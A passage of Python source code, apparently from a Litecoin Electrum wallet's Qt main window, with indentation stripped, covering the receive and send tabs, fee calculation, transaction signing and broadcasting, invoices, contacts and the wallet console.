self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Litecoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Litecoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Litecoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 2 if self.fee_unit else 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
displayed_feerate = displayed_feerate // 1000 if displayed_feerate else 0
displayed_fee = displayed_feerate * size
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
if feerounding:
self.feerounding_icon.setToolTip(
_('additional {} satoshis will be added').format(feerounding))
self.feerounding_icon.setVisible(True)
else:
self.feerounding_icon.setVisible(False)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Litecoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Litecoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid litecoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
